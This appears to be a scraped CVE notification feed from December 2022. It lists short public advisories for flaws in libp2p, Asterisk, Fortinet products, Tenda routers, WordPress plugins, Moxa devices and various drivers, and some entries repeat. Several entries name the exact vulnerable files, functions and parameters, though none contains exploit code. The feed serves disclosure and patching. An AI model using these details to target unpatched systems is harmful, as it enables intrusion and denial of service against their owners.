🚨 CVE-2022-23486libp2p-rust is the official rust language Implementation of the libp2p networking stack. In versions prior to 0.45.1 an attacker node can cause a victim node to allocate a large number of small memory chunks, which can ultimately lead to the victim’s process running out of memory and thus getting killed by its operating system. When executed continuously, this can lead to a denial of service attack, especially relevant on a larger scale when run against more than one node of a libp2p based network. Users are advised to upgrade to `libp2p` `v0.45.1` or above. Users unable to upgrade should reference the DoS Mitigation page for more information on how to incorporate mitigation strategies, monitor their application, and respond to attacks: https://docs.libp2p.io/reference/dos-mitigation/.🎖@cveNotify |
|
| 2022-12-07 23:47:43 |
🚨 CVE-2022-23487js-libp2p is the official javascript Implementation of libp2p networking stack. Versions older than `v0.38.0` of js-libp2p are vulnerable to targeted resource exhaustion attacks. These attacks target libp2p’s connection, stream, peer, and memory management. An attacker can cause the allocation of large amounts of memory, ultimately leading to the process getting killed by the host’s operating system. While a connection manager tasked with keeping the number of connections within manageable limits has been part of js-libp2p, this component was designed to handle the regular churn of peers, not a targeted resource exhaustion attack. Users are advised to update their js-libp2p dependency to `v0.38.0` or greater. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2022-12-07 23:47:42 |
🚨 CVE-2021-33558** DISPUTED ** Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js. NOTE: multiple third parties report that this is a site-specific issue because those files are not part of Boa.🎖@cveNotify |
|
| 2022-12-07 23:47:38 |
🚨 CVE-2017-9833** DISPUTED ** /cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable.🎖@cveNotify |
|
| 2022-12-07 23:47:37 |
🚨 CVE-2022-44351Skycaiji v2.5.1 was discovered to contain a deserialization vulnerability via /SkycaijiApp/admin/controller/Mystore.php.🎖@cveNotify |
|
| 2022-12-07 23:47:36 |
🚨 CVE-2022-44373A stack overflow vulnerability exists in TrendNet Wireless AC Easy-Upgrader TEW-820AP (Version v1.0R, firmware version 1.01.B01) which may result in remote code execution.🎖@cveNotify |
|
| 2022-12-07 23:47:35 |
🚨 CVE-2022-45550AyaCMS 3.1.2 is vulnerable to Remote Code Execution (RCE).🎖@cveNotify |
|
| 2022-12-07 22:47:27 |
🚨 CVE-2022-42705A use-after-free in res_pjsip_pubsub.c in Sangoma Asterisk 16.28, 18.14, 19.6, and certified/18.9-cert2 may allow a remote authenticated attacker to crash Asterisk (denial of service) by performing activity on a subscription via a reliable transport at the same time that Asterisk is also performing activity on that subscription.🎖@cveNotify |
|
| 2022-12-07 22:47:26 |
🚨 CVE-2022-42782In wlan driver, there is a possible missing permission check, This could lead to local information disclosure.🎖@cveNotify |
|
| 2022-12-07 22:47:25 |
🚨 CVE-2022-42706An issue was discovered in Sangoma Asterisk through 16.28, 17 and 18 through 18.14, 19 through 19.6, and certified through 18.9-cert1. GetConfig, via Asterisk Manager Interface, allows a connected application to access files outside of the asterisk configuration directory, aka Directory Traversal.🎖@cveNotify |
|
| 2022-12-07 22:47:24 |
🚨 CVE-2022-42766In wlan driver, there is a possible missing permission check, This could lead to local information disclosure.🎖@cveNotify |
|
| 2022-12-07 17:47:53 |
🚨 CVE-2022-39091In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-07 17:47:52 |
🚨 CVE-2022-39090In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-07 17:47:51 |
🚨 CVE-2022-34881Generation of Error Message Containing Sensitive Information vulnerability in Hitachi JP1/Automatic Operation allows local users to gain sensitive information. This issue affects JP1/Automatic Operation: from 10-00 through 10-54-03, from 11-00 before 11-51-09, from 12-00 before 12-60-01.🎖@cveNotify |
|
| 2022-12-07 17:47:50 |
🚨 CVE-2022-39102In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-07 17:47:49 |
🚨 CVE-2022-39100In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-07 17:47:48 |
🚨 CVE-2022-39101In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-07 17:47:47 |
🚨 CVE-2022-25912The package simple-git before 3.15.0 are vulnerable to Remote Code Execution (RCE) when enabling the ext transport protocol, which makes it exploitable via clone() method. This vulnerability exists due to an incomplete fix of [CVE-2022-24066](https://security.snyk.io/vuln/SNYK-JS-SIMPLEGIT-2434306).🎖@cveNotify |
|
| 2022-12-07 17:47:46 |
🚨 CVE-2022-24439All versions of package gitpython are vulnerable to Remote Code Execution (RCE) due to improper user input validation, which makes it possible to inject a maliciously crafted remote URL into the clone command. Exploiting this vulnerability is possible because the library makes external calls to git without sufficient sanitization of input arguments.🎖@cveNotify |
|
| 2022-12-07 17:47:45 |
🚨 CVE-2022-42771In wlan driver, there is a race condition, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-07 17:47:44 |
🚨 CVE-2022-39095In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-07 17:47:40 |
🚨 CVE-2022-42770In wlan driver, there is a race condition, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-07 17:47:39 |
🚨 CVE-2022-39106In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-07 17:47:38 |
🚨 CVE-2022-39129In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-07 17:47:37 |
🚨 CVE-2022-44009Improper access control in Key-Value RBAC in StackStorm version 3.7.0 didn't check the permissions in Jinja filters, allowing attackers to access K/V pairs of other users, potentially leading to the exposure of sensitive Information.🎖@cveNotify |
|
| 2022-12-07 17:47:36 |
🚨 CVE-2022-39132In camera driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-07 17:47:32 |
🚨 CVE-2022-39131In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-07 17:47:30 |
🚨 CVE-2022-4173A vulnerability within the malware removal functionality of Avast and AVG Antivirus allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avast and AVG Antivirus version 22.10.🎖@cveNotify |
|
| 2022-12-07 17:47:29 |
🚨 CVE-2022-46151Querybook is an open source data querying UI. In affected versions user provided data is not escaped in the error field of the auth callback url in `querybook/server/app/auth/oauth_auth.py` and `querybook/server/app/auth/okta_auth.py`. This may allow attackers to perform reflected cross site scripting (XSS) if Content Security Policy (CSP) is not enabled or `unsafe-inline` is allowed. Users are advised to upgrade to the latest, patched version of querybook (version 3.14.2 or greater). Users unable to upgrade may enable CSP and not allow unsafe-inline or manually escape query parameters in a reverse proxy.🎖@cveNotify |
|
| 2022-12-07 17:47:28 |
🚨 CVE-2022-42754In npu driver, there is a memory corruption due to a use after free. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-07 07:47:44 |
🚨 CVE-2022-44942Casdoor before v1.126.1 was discovered to contain an arbitrary file deletion vulnerability via the uploadFile function.🎖@cveNotify |
|
| 2022-12-07 07:47:43 |
🚨 CVE-2022-44849A Cross-Site Request Forgery (CSRF) in the Administrator List of MetInfo v7.7 allows attackers to arbitrarily add Super Administrator account.🎖@cveNotify |
|
| 2022-12-07 07:47:42 |
🚨 CVE-2022-45008Online Leave Management System v1.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /leave_system/admin/?page=maintenance/department. This vulnerability allows attackers to execute arbitrary web scripts or HTML via crafted payload injected into the Name field under the Create New module.🎖@cveNotify |
|
| 2022-12-07 07:47:38 |
🚨 CVE-2022-41800In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2022-12-07 07:47:37 |
🚨 CVE-2022-41994Stored cross-site scripting vulnerability in Permission Settings of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.🎖@cveNotify |
|
| 2022-12-07 07:47:33 |
🚨 CVE-2022-45025Markdown Preview Enhanced v0.6.5 and v0.19.6 for VSCode and Atom was discovered to contain a command injection vulnerability via the PDF file import function.🎖@cveNotify |
|
| 2022-12-07 07:47:32 |
🚨 CVE-2022-43468External initialization of trusted variables or data stores vulnerability exists in WordPress Popular Posts 6.0.5 and earlier, therefore the vulnerable product accepts untrusted external inputs to update certain internal variables. As a result, the number of views for an article may be manipulated through a crafted input.🎖@cveNotify |
|
| 2022-12-07 07:47:31 |
🚨 CVE-2022-43508Use-after free vulnerability exists in CX-Programmer v.9.77 and earlier, which may lead to information disclosure and/or arbitrary code execution by having a user to open a specially crafted CXP file.🎖@cveNotify |
|
| 2022-12-07 07:47:28 |
🚨 CVE-2022-41622In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2022-12-07 07:47:27 |
🚨 CVE-2022-43660Improper neutralization of Server-Side Includes (SSW) within a web page in Movable Type series allows a remote authenticated attacker with Privilege of 'Manage of Content Types' may execute an arbitrary Perl script and/or an arbitrary OS command. Affected products/versions are as follows: Movable Type 7 r.5301 and earlier (Movable Type 7 Series), Movable Type Advanced 7 r.5301 and earlier (Movable Type Advanced 7 Series), Movable Type Premium 1.53 and earlier, and Movable Type Premium Advanced 1.53 and earlier.🎖@cveNotify |
|
| 2022-12-07 07:47:26 |
🚨 CVE-2022-43668Typora versions prior to 1.4.4 fails to properly neutralize JavaScript code, which may result in executing JavaScript code contained in the file when opening a file with the affected product.🎖@cveNotify |
|
| 2022-12-07 02:47:24 |
🚨 CVE-2022-44030Redmine 5.x before 5.0.4 allows downloading of file attachments of any Issue or any Wiki page due to insufficient permission checks. Depending on the configuration, this may require login as a registered user.🎖@cveNotify |
|
| 2022-12-06 23:47:33 |
🚨 CVE-2020-12351Improper input validation in BlueZ may allow an unauthenticated user to potentially enable escalation of privilege via adjacent access.🎖@cveNotify |
|
| 2022-12-06 23:47:26 |
🚨 CVE-2020-25638A flaw was found in hibernate-core in versions prior to and including 5.4.23.Final. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.🎖@cveNotify |
|
| 2022-12-06 23:47:25 |
🚨 CVE-2021-42694** DISPUTED ** An issue was discovered in the character definitions of the Unicode Specification through 14.0. The specification allows an adversary to produce source code identifiers such as function names using homoglyphs that render visually identical to a target identifier. Adversaries can leverage this to inject code via adversarial identifier definitions in upstream software dependencies invoked deceptively in downstream software. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard (all versions). Unless mitigated, an adversary could produce source code identifiers using homoglyph characters that render visually identical to but are distinct from a target identifier. In this way, an adversary could inject adversarial identifier definitions in upstream software that are not detected by human reviewers and are invoked deceptively in downstream software. The Unicode Consortium has documented this class of security vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms.🎖@cveNotify |
|
| 2022-12-06 21:47:23 |
🚨 CVE-2022-46464ConcreteCMS v9.1.3 was discovered to be vulnerable to Xpath injection attacks. This vulnerability allows attackers to access sensitive XML data via a crafted payload injected into the URL path folder "3".🎖@cveNotify |
|
| 2022-12-06 21:47:22 |
🚨 CVE-2022-45990A cross-site scripting (XSS) vulnerability in the component /signup_script.php of Ecommerce-Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the eMail parameter.🎖@cveNotify |
|
| 2022-12-06 20:48:10 |
🚨 CVE-2022-34361IBM Sterling Secure Proxy 6.0.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 230522.🎖@cveNotify |
|
| 2022-12-06 20:48:08 |
🚨 CVE-2021-22015The vCenter Server contains multiple local privilege escalation vulnerabilities due to improper permissions of files and directories. An authenticated local user with non-administrative privilege may exploit these issues to elevate their privileges to root on vCenter Server Appliance.🎖@cveNotify |
|
| 2022-12-06 20:48:06 |
🚨 CVE-2022-32629In isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310774; Issue ID: ALPS07310774.🎖@cveNotify |
|
| 2022-12-06 20:48:03 |
🚨 CVE-2022-32628In isp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07310780; Issue ID: ALPS07310780.🎖@cveNotify |
|
| 2022-12-06 20:48:02 |
🚨 CVE-2022-32626In display, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07326239; Issue ID: ALPS07326239.🎖@cveNotify |
|
| 2022-12-06 20:48:00 |
🚨 CVE-2022-32625In display, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07326216; Issue ID: ALPS07326216.🎖@cveNotify |
|
| 2022-12-06 20:47:58 |
🚨 CVE-2022-3677The Advanced Import WordPress plugin before 1.3.8 does not have CSRF check when installing and activating plugins, which could allow attackers to make a logged in admin install arbitrary plugins from WordPress.org, and activate arbitrary ones from the blog via CSRF attacks🎖@cveNotify |
|
| 2022-12-06 20:47:56 |
🚨 CVE-2022-3426The Advanced WP Columns WordPress plugin through 2.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2022-12-06 20:47:54 |
🚨 CVE-2022-3249The WP CSV Exporter WordPress plugin before 1.3.7 does not properly sanitise and escape some parameters before using them in a SQL statement, allowing high privilege users such as admin to perform SQL injection attacks🎖@cveNotify |
|
| 2022-12-06 20:47:52 |
🚨 CVE-2022-1540The PostmagThemes Demo Import WordPress plugin through 1.0.7 does not validate the imported file, allowing high-privilege users such as admin to upload arbitrary files (such as PHP) leading to RCE.🎖@cveNotify |
|
| 2022-12-06 20:47:50 |
🚨 CVE-2022-43900IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps 1.4.2 could provide a weaker than expected security. A local attacker can create an outbound network connection to another system. IBM X-Force ID: 240827.🎖@cveNotify |
|
| 2022-12-06 20:47:48 |
🚨 CVE-2022-30305An insufficient logging [CWE-778] vulnerability in FortiSandbox versions 4.0.0 to 4.0.2, 3.2.0 to 3.2.3 and 3.1.0 to 3.1.5 and FortiDeceptor versions 4.2.0, 4.1.0 through 4.1.1, 4.0.0 through 4.0.2, 3.3.0 through 3.3.3, 3.2.0 through 3.2.2,3.1.0 through 3.1.1 and 3.0.0 through 3.0.2 may allow a remote attacker to repeatedly enter incorrect credentials without causing a log entry, and with no limit on the number of failed authentication attempts.🎖@cveNotify |
|
| 2022-12-06 20:47:43 |
🚨 CVE-2022-33875An improper neutralization of special elements used in an SQL Command ('SQL Injection') vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to execute unauthorized code or commands via specifically crafted HTTP requests.🎖@cveNotify |
|
| 2022-12-06 20:47:41 |
🚨 CVE-2022-33876Multiple instances of improper input validation vulnerability in Fortinet FortiADC version 7.1.0, version 7.0.0 through 7.0.2 and version 6.2.4 and below allows an authenticated attacker to retrieve files with specific extension from the underlying Linux system via crafted HTTP requests.🎖@cveNotify |
|
| 2022-12-06 20:47:39 |
🚨 CVE-2022-35843An authentication bypass by assumed-immutable data vulnerability [CWE-302] in the FortiOS SSH login component 7.2.0, 7.0.0 through 7.0.7, 6.4.0 through 6.4.9, 6.2 all versions, 6.0 all versions and FortiProxy SSH login component 7.0.0 through 7.0.5, 2.0.0 through 2.0.10, 1.2.0 all versions may allow a remote and unauthenticated attacker to login into the device via sending specially crafted Access-Challenge response from the Radius server.🎖@cveNotify |
|
| 2022-12-06 20:47:37 |
🚨 CVE-2022-38379Improper neutralization of input during web page generation [CWE-79] in FortiSOAR 7.0.0 through 7.0.3 and 7.2.0 may allow an authenticated attacker to inject HTML tags via input fields of various components within FortiSOAR.🎖@cveNotify |
|
| 2022-12-06 20:47:34 |
🚨 CVE-2022-40680A improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiOS 6.0.7 - 6.0.15, 6.2.2 - 6.2.12, 6.4.0 - 6.4.9 and 7.0.0 - 7.0.3 allows a privileged attacker to execute unauthorized code or commands via storing malicious payloads in replacement messages.🎖@cveNotify |
|
| 2022-12-06 20:47:32 |
🚨 CVE-2022-45326An XML external entity (XXE) injection vulnerability in Kwoksys Kwok Information Server before v2.9.5.SP31 allows remote authenticated users to conduct server-side request forgery (SSRF) attacks.🎖@cveNotify |
|
| 2022-12-06 20:47:30 |
🚨 CVE-2022-43901IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps 1.4.3 could disclose sensitive information. An authenticated local attacker could exploit this vulnerability to possibly gain information to other IBM WebSphere Automation for IBM Cloud Pak for Watson AIOps components. IBM X-Force ID: 240829.🎖@cveNotify |
|
| 2022-12-06 20:47:28 |
🚨 CVE-2022-45315Mikrotik RouterOs before stable v7.6 was discovered to contain an out-of-bounds read in the snmp process. This vulnerability allows attackers to execute arbitrary code via a crafted packet.🎖@cveNotify |
|
| 2022-12-06 17:47:44 |
🚨 CVE-2022-43470Cross-site request forgery (CSRF) vulnerability in +F FS040U software versions v2.3.4 and earlier, +F FS020W software versions v4.0.0 and earlier, +F FS030W software versions v3.3.5 and earlier, and +F FS040W software versions v1.4.1 and earlier allows an adjacent attacker to hijack the authentication of an administrator and user's unintended operations such as to reboot the product and/or reset the configuration to the initial set-up may be performed.🎖@cveNotify |
|
| 2022-12-06 17:47:43 |
🚨 CVE-2022-45649Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the endIp parameter in the formSetPPTPServer function.🎖@cveNotify |
|
| 2022-12-06 17:47:42 |
🚨 CVE-2022-45648Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the devName parameter in the formSetDeviceName function.🎖@cveNotify |
|
| 2022-12-06 17:47:41 |
🚨 CVE-2022-45650Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the firewallEn parameter in the formSetFirewallCfg function.🎖@cveNotify |
|
| 2022-12-06 17:47:38 |
🚨 CVE-2022-38123Improper Input Validation of plugin files in Administrator Interface of Secomea GateManager allows a server administrator to inject code into the GateManager interface. This issue affects: Secomea GateManager versions prior to 10.0.🎖@cveNotify |
|
| 2022-12-06 17:47:37 |
🚨 CVE-2022-41325An integer overflow in the VNC module in VideoLAN VLC Media Player through 3.0.17.4 allows attackers, by tricking a user into opening a crafted playlist or connecting to a rogue VNC server, to crash VLC or execute code under some conditions.🎖@cveNotify |
|
| 2022-12-06 17:47:36 |
🚨 CVE-2022-44289Thinkphp 5.1.41 and 5.0.24 has a code logic error which causes file upload getshell.🎖@cveNotify |
|
| 2022-12-06 17:47:35 |
🚨 CVE-2022-46382RackN Digital Rebar through 4.6.14, 4.7 through 4.7.22, 4.8 through 4.8.5, 4.9 through 4.9.12, and 4.10 through 4.10.8 has Insecure Permissions. After signing into Digital Rebar, users are issued authentication tokens tied to their account to perform actions within Digital Rebar. During the validation process of these tokens, Digital Rebar did not check if the user account still exists. Deleted Digital Rebar users could still use their tokens to perform actions within Digital Rebar.🎖@cveNotify |
|
| 2022-12-06 17:47:31 |
🚨 CVE-2022-45647Tenda AC6V1.0 V15.03.05.19 was discovered to contain a buffer overflow via the limitSpeed parameter in the formSetClientState function.🎖@cveNotify |
|
| 2022-12-06 17:47:30 |
🚨 CVE-2022-43442Plaintext storage of a password vulnerability exists in +F FS040U software versions v2.3.4 and earlier, which may allow an attacker to obtain the login password of +F FS040U and log in to the management console.🎖@cveNotify |
|
| 2022-12-06 17:47:29 |
🚨 CVE-2022-32594In widevine, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07446207; Issue ID: ALPS07446207.🎖@cveNotify |
|
| 2022-12-06 17:47:25 |
🚨 CVE-2022-40259AMI MegaRAC Redfish Arbitrary Code Execution🎖@cveNotify |
|
| 2022-12-06 17:47:24 |
🚨 CVE-2022-3088UC-8100A-ME-T System Image: Versions v1.0 to v1.6, UC-2100 System Image: Versions v1.0 to v1.12, UC-2100-W System Image: Versions v1.0 to v 1.12, UC-3100 System Image: Versions v1.0 to v1.6, UC-5100 System Image: Versions v1.0 to v1.4, UC-8100 System Image: Versions v3.0 to v3.5, UC-8100-ME-T System Image: Versions v3.0 and v3.1 UC-8200 System Image: v1.0 to v1.5, AIG-300 System Image: v1.0 to v1.4, UC-8410A with Debian 9 System Image: Versions v4.0.2 and v4.1.2, UC-8580 with Debian 9 System Image: Versions v2.0 and v2.1, UC-8540 with Debian 9 System Image: Versions v2.0 and v2.1, and DA-662C-16-LX (GLB) System Image: Versions v1.0.2 to v1.1.2 of Moxa's ARM-based computers have an execution with unnecessary privileges vulnerability, which could allow an attacker with user-level privileges to gain root privileges.🎖@cveNotify |
|
| 2022-12-06 17:47:23 |
🚨 CVE-2020-10005A resource exhaustion issue was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.0.1. An attacker in a privileged network position may be able to perform denial of service.🎖@cveNotify |
|
| 2022-12-06 15:47:49 |
🚨 CVE-2022-43479Open redirect vulnerability in SHIRASAGI v1.14.4 to v1.15.0 allows a remote unauthenticated attacker to redirect users to an arbitrary web site and conduct a phishing attack.🎖@cveNotify |
|
| 2022-12-06 15:47:48 |
🚨 CVE-2022-43487Cross-site scripting vulnerability in Salon booking system versions prior to 7.9 allows a remote unauthenticated attacker to inject an arbitrary script.🎖@cveNotify |
|
| 2022-12-06 15:47:46 |
🚨 CVE-2022-43497Cross-site scripting vulnerability in WordPress versions prior to 6.0.3 allows a remote unauthenticated attacker to inject an arbitrary script .🎖@cveNotify |
|
| 2022-12-06 15:47:45 |
🚨 CVE-2022-43499Stored cross-site scripting vulnerability in SHIRASAGI versions prior to v1.16.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.🎖@cveNotify |
|
| 2022-12-06 15:47:43 |
🚨 CVE-2022-43500Cross-site scripting vulnerability in WordPress versions prior to 6.0.3 allows a remote unauthenticated attacker to inject an arbitrary script .🎖@cveNotify |
|
| 2022-12-06 15:47:41 |
🚨 CVE-2021-37533Prior to Apache Commons Net 3.9.0, Net's FTP client trusts the host from PASV response by default. A malicious server can redirect the Commons Net code to use a different host, but the user has to connect to the malicious server in the first place. This may lead to leakage of information about services running on the private network of the client. The default in version 3.9.0 is now false to ignore such hosts, as cURL does. See https://issues.apache.org/jira/browse/NET-711.🎖@cveNotify |
|
| 2022-12-06 14:47:58 |
🚨 CVE-2022-3086An attacker with physical access to Moxa's bootloader versions of UC-8580 Series V1.1, UC-8540 Series V1.0 to V1.2, UC-8410A Series V2.2, UC-8200 Series V1.0 to V2.4, UC-8100A-ME-T Series V1.0 to V1.1, UC-8100 Series V1.2 to V1.3, UC-5100 Series V1.2, UC-3100 Series V1.2 to V2.0, UC-2100 Series V1.3 to V1.5, and UC-2100-W Series V1.3 to V1.5 can initiate a restart of the device and gain access to its BIOS. Command line options can then be altered, allowing the attacker to access the terminal. From the terminal, the attacker can modify the device’s authentication files to create a new user and gain full access to the system.🎖@cveNotify |
|
| 2022-12-06 14:47:57 |
🚨 CVE-2022-2642Horner Automation’s RCC 972 firmware version 15.40 contains global variables. This could allow an attacker to read out sensitive values and variable keys from the device.🎖@cveNotify |
|
| 2022-12-06 14:47:56 |
🚨 CVE-2022-2640The Config-files of Horner Automation’s RCC 972 with firmware version 15.40 are encrypted with weak XOR encryption vulnerable to reverse engineering. This could allow an attacker to obtain credentials to run services such as File Transfer Protocol (FTP) and Hypertext Transfer Protocol (HTTP).🎖@cveNotify |
|
| 2022-12-06 14:47:55 |
🚨 CVE-2022-46167Capsule is a multi-tenancy and policy-based framework for Kubernetes. Prior to version 0.1.3, a ServiceAccount deployed in a Tenant Namespace, when granted with `PATCH` capabilities on its own Namespace, is able to edit it and remove the Owner Reference, breaking the reconciliation of the Capsule Operator and removing all the enforcement like Pod Security annotations, Network Policies, Limit Range and Resource Quota items. An attacker could detach the Namespace from a Tenant that is forbidding starting privileged Pods using the Pod Security labels by removing the OwnerReference, removing the enforcement labels, and being able to start privileged containers that would be able to start a generic Kubernetes privilege escalation. Patches have been released for version 0.1.3. No known workarounds are available.🎖@cveNotify |
|
| 2022-12-06 14:47:52 |
🚨 CVE-2022-3520Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.0765.🎖@cveNotify |
|
| 2022-12-06 14:47:51 |
🚨 CVE-2022-46145authentik is an open-source identity provider. Versions prior to 2022.11.2 and 2022.10.2 are vulnerable to unauthorized user creation and potential account takeover. With the default flows, unauthenticated users can create new accounts in authentik. If a flow exists that allows for email-verified password recovery, this can be used to overwrite the email address of admin accounts and take over their accounts. authentik 2022.11.2 and 2022.10.2 fix this issue. As a workaround, a policy can be created and bound to the `default-user-settings-flow flow` with the contents `return request.user.is_authenticated`.🎖@cveNotify |
|
| 2022-12-06 14:47:50 |
🚨 CVE-2022-39095In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 14:47:49 |
🚨 CVE-2022-39096In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 14:47:45 |
🚨 CVE-2022-39098In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 14:47:44 |
🚨 CVE-2022-39099In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 14:47:43 |
🚨 CVE-2022-39100In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 14:47:42 |
🚨 CVE-2022-39101In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 14:47:39 |
🚨 CVE-2022-39102In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 14:47:38 |
🚨 CVE-2022-39106In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 14:47:37 |
🚨 CVE-2022-39129In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 14:47:36 |
🚨 CVE-2022-39131In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:55 |
🚨 CVE-2022-39102In power management service, there is a missing permission check. This could lead to set up power management service with no additional execution privileges needed.🎖@cveNotify |
|
| 2022-12-06 11:47:53 |
🚨 CVE-2022-39106In sensor driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:51 |
🚨 CVE-2022-39129In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:50 |
🚨 CVE-2022-39130In face detect driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:48 |
🚨 CVE-2022-39131In camera driver, there is a possible memory corruption due to improper locking. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:46 |
🚨 CVE-2022-39132In camera driver, there is a possible out of bounds write due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:44 |
🚨 CVE-2022-39133In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:43 |
🚨 CVE-2022-39134In audio driver, there is a use after free due to a race condition. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:41 |
🚨 CVE-2022-42754In npu driver, there is a memory corruption due to a use after free. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:39 |
🚨 CVE-2022-42755In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:38 |
🚨 CVE-2022-42756In sensor driver, there is a possible buffer overflow due to a missing bounds check. This could lead to local denial of service in kernel.🎖@cveNotify |
|
| 2022-12-06 11:47:36 |
🚨 CVE-2022-42757In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:35 |
🚨 CVE-2022-42758In wlan driver, there is a possible missing bounds check, This could lead to local denial of service in wlan services.🎖@cveNotify |
|
| 2022-12-06 11:47:33 |
